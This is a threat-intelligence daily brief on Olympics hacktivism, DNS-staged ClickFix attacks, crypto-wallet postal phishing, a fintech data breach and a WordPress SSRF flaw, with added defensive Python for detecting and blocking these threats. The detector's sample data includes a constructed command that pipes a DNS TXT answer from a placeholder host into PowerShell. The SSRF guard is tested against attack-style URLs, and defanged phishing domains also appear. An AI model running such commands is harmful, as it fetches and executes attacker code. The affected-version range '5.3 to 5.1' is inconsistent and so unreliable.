ZeroFox Daily Intelligence Brief - February 16, 2026
by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- ZeroFox Intelligence Flash Report - Sabotage and Cyber Disruptions at Milano Olympics
- Threat Actors Abuse DNS Lookups in Evolved ClickFix Attacks
- Postal Phishing Scam Hits Trezor and Ledger Crypto Wallet Holders
ZeroFox Intelligence Flash Report - Sabotage and Cyber Disruptions at Milano Olympics
Source: https://www.zerofox.com/advisories/38403/
What we know: ZeroFox has observed politically motivated, primarily pro-Russian threat actors overtly targeting the 2026 Winter Olympics since the event commenced. Z-Pentest and NoName057(16)—two of the most active pro-Russian hacktivist groups—have claimed responsibility for the majority of these attacks.
Context: These groups were observed to employ easily disseminated and replicated tactics, techniques, and procedures (TTPs), which enable widespread adoption and a consistently high rate of attack. The Russian Federation has a history of targeting the Olympics with cyberattacks as revenge for its formal exclusion from the Games.
Analyst note: As of reporting, the attacks have been low-impact, which aligns with these groups’ level of sophistication. Although pro-Russia hacktivists have occasionally damaged critical infrastructure, they often exaggerate their capabilities and the impact of their attacks to garner more attention.
Threat Actors Abuse DNS Lookups in Evolved ClickFix Attacks
Source: https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html
What we know: The Domain Name System (DNS) is being used as a staging channel in "ClickFix" social engineering tactics, with threat actors weaponizing DNS lookups ("nslookup") to install the ModeloRAT remote access trojan on victims' systems.
Context: ClickFix relies on unsuspecting victims copy-pasting malicious commands on their systems after falling prey to lures such as fake CAPTCHAs or fraudulent user guides. While DNS has been weaponized previously (for command and control and for data exfiltration), the current use of DNS as a staging channel for a ClickFix attack is unique.
Analyst note: The evolution to DNS-based staging indicates a sophisticated effort to bypass system security controls, allowing the threat actors to blend malicious activity with normal DNS traffic. This makes the activity harder for defenders to track or take down, necessitating close monitoring of unusual nslookup patterns. This technique is likely to be adopted by other actors that rely on ClickFix variants, including CrashFix and ConsentFix.
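The analyst note above recommends monitoring for unusual nslookup patterns. The script below is an added example of what that triage could look like over endpoint process-creation telemetry; it is not ZeroFox or Microsoft code. The three events are constructed, their field names only mimic Sysmon Event ID 1 (Image, ParentImage, CommandLine), and the scoring features and weights are assumptions to tune per environment rather than indicators the article specifies. It scores each nslookup invocation on whether the shell was launched directly from explorer.exe (the shape of a pasted Run-dialog command), whether it queries TXT records, whether the lookup output is piped into a command interpreter, and whether any queried label is unusually long, then flags events above a threshold.

```python
"""Heuristic triage of process-creation telemetry for nslookup-based ClickFix
staging. Added example, not ZeroFox or Microsoft code. Sample events are
constructed; field names mimic Sysmon Event ID 1 and all weights are assumptions.
"""
import re

# Constructed sample events (no real telemetry).
SAMPLE_EVENTS = [
    # benign: admin resolving an internal host from an already-open terminal
    {"ts": "2026-02-16T09:01:12Z", "host": "ws01", "user": "alice",
     "Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nslookup mail.example.internal"},
    # suspicious: shell launched from explorer.exe (Run dialog), TXT query on a
    # long random-looking label, and the answer piped into an interpreter
    {"ts": "2026-02-16T09:14:33Z", "host": "ws07", "user": "bob",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c nslookup -type=txt "
                    "a8f3k2q9z1x7c4v6b0n5m2l8.staging-placeholder.test | powershell -"},
    # benign-looking: mail admin checking a DMARC TXT record from a script
    {"ts": "2026-02-16T09:20:05Z", "host": "srv02", "user": "svc_mail",
     "Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nslookup -type=txt _dmarc.example.test"},
]

INTERPRETERS = r"powershell|pwsh|cmd|mshta|wscript|cscript"
TXT_QUERY = re.compile(r"-(?:type|q|querytype)=txt", re.I)
PIPED_TO_INTERPRETER = re.compile(r"\|\s*(?:" + INTERPRETERS + r")\b", re.I)
DOMAIN = re.compile(r"[A-Za-z0-9_-]+(?:\.[A-Za-z0-9_-]+)+")
LONG_LABEL = 20  # assumption: labels this long rarely appear in human-typed lookups


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one event; events without nslookup score 0."""
    cl = ev.get("CommandLine", "")
    if "nslookup" not in cl.lower():
        return 0, []
    score, reasons = 0, []
    if _basename(ev.get("ParentImage", "")) == "explorer.exe":
        score += 2
        reasons.append("shell spawned by explorer.exe (pasted/Run-dialog command)")
    if TXT_QUERY.search(cl):
        score += 2
        reasons.append("TXT record query")
    if PIPED_TO_INTERPRETER.search(cl):
        score += 3
        reasons.append("lookup output piped into an interpreter")
    labels = (label for name in DOMAIN.findall(cl) for label in name.split("."))
    if any(len(label) >= LONG_LABEL for label in labels):
        score += 1
        reasons.append("unusually long DNS label")
    return score, reasons


def triage(events, threshold=4):
    """Return copies of events scoring at or above threshold, highest first."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append(dict(ev, score=score, reasons=reasons))
    flagged.sort(key=lambda e: -e["score"])
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["ts"], hit["host"], hit["user"], hit["score"], "; ".join(hit["reasons"]))
```

Only the second event crosses the threshold; the DMARC lookup scores on the TXT feature alone and stays below it, which is the kind of false positive a single-feature rule would raise. The same features translate directly into an EDR or Sigma rule once the weights have been checked against a baseline of legitimate nslookup use.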
Postal Phishing Scam Hits Trezor and Ledger Crypto Wallet Holders
What we know: Trezor and Ledger cryptocurrency hardware wallet holders are reportedly being targeted in a phishing-letters scam for crypto theft, with threat actors trying to trick users into revealing recovery phrases by scanning QR codes.
Context: Physical letters with seemingly official letterheads coerce wallet users to complete a mandatory "Authentication Check" or "Transaction Check" to ensure wallet access, creating a sense of urgency. The QR codes lead to the phishing sites—hXXps://trezor.authentication-check[.]io/ and hXXps://ledger.setuptransactioncheck[.]com/—impersonating Trezor and Ledger pages.
Analyst note: Threat actors likely gained target information from data breaches at Trezor and Ledger. Compromised recovery phrases are almost certainly going to give threat actors complete access to the wallet and its funds.
DEEP AND DARK WEB INTELLIGENCE
Fintech Giant Hit by Data Breach: ShinyHunters has reportedly breached Figure, a blockchain-based fintech company, claiming to have leaked 2.5 GB of stolen data on its dark web leak site after the company denied a ransom demand. The leaked dataset reportedly includes customers’ full names, residential addresses, dates of birth, and phone numbers. The hackers allegedly lured an employee using a social engineering attack to gain initial access to the systems. Additionally, ShinyHunters claimed that the attack was part of a large hacking campaign targeting companies that rely on the single sign-on provider Okta. There is a roughly even chance that the leaked dataset could be used for dox-to-door attacks, swatting, or spear-stalking leading to physical as well as financial harm.
VULNERABILITY AND EXPLOIT INTELLIGENCE
CVE-2026-1249: This is an authenticated server-side request forgery (SSRF) flaw in the Sonaar MP3 Audio Player for WordPress that enables threat actors to make unauthorized requests to internal network resources via the "load_lyrics_ajax_callback" function. Attackers with author-level access are likely to exploit the flaw to probe internal services and bypass firewall restrictions.
Affected products: MP3 Audio Player - Music Player, Podcast Player & Radio by Sonaar plugin for WordPress versions 5.3 to 5.1
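The flaw above is the classic SSRF shape: a server-side feature fetches a URL supplied by a low-privileged user and can be pointed at internal services. The code below is an added example of the hardened pattern for such a fetcher; it is not the Sonaar plugin's code (which is PHP) and does not describe how the plugin is fixed. The host allowlist, the sample DNS answers and the blocked-range defaults are constructed assumptions. It validates scheme, rejects userinfo tricks and non-standard ports, requires the host to be on an allowlist, and then resolves the host and refuses any address in loopback, private, link-local (including the cloud metadata range), CGNAT, multicast or reserved space, including IPv4-mapped IPv6 forms.

```python
"""SSRF guard for a server-side URL fetcher. Added example, not the plugin's
code. Allowlist, fake DNS answers and blocked ranges are constructed assumptions.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges a server-side fetcher must never reach. Assumption: a sensible default;
# extend it to match your own network.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed allowlist of the only hosts the feature legitimately needs.
ALLOWED_HOSTS = {"lyrics.example-provider.test", "cdn.example-provider.test"}

# Constructed DNS answers so the example runs offline; use system_resolve() live.
FAKE_DNS = {
    "lyrics.example-provider.test": ["203.0.113.10"],
    "cdn.example-provider.test": ["169.254.169.254"],  # poisoned/rebound answer
}


def system_resolve(host):
    """Real resolver for production use (not exercised by the offline sample)."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def is_blocked(ip):
    """True if ip (str or address object) falls in any blocked range."""
    ip = ipaddress.ip_address(ip)
    mapped = getattr(ip, "ipv4_mapped", None)  # ::ffff:10.0.0.1 -> 10.0.0.1
    if mapped is not None:
        ip = mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def check_fetch_target(url, resolve, allowed_hosts=ALLOWED_HOSTS):
    """Return (ok, reason, ips). Fetch only when ok, and connect to the returned
    ips rather than resolving again, so a DNS rebind cannot swap the target."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not http(s)", []
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL", []
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False, "empty host", []
    if parts.port not in (None, 80, 443):
        return False, "non-standard port", []
    if host not in allowed_hosts:
        return False, "host not allowlisted", []
    try:
        ips = resolve(host)
    except (OSError, KeyError):
        return False, "resolution failed", []
    for ip in ips:
        if is_blocked(ip):
            return False, f"resolves to blocked address {ip}", []
    return True, "ok", list(ips)


if __name__ == "__main__":
    for candidate in ("https://lyrics.example-provider.test/song.txt",
                      "http://cdn.example-provider.test/x",
                      "http://127.0.0.1:8080/admin",
                      "http://lyrics.example-provider.test@evil.test/"):
        print(candidate, "->", check_fetch_target(candidate, FAKE_DNS.__getitem__)[:2])
```

The allowlist is the control that actually removes the probing capability; the address check is defence in depth for the case where an allowlisted name resolves somewhere it should not. Pinning the connection to the validated addresses matters because a validate-then-re-resolve sequence reopens the hole.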
Tags: DIB, tlp:green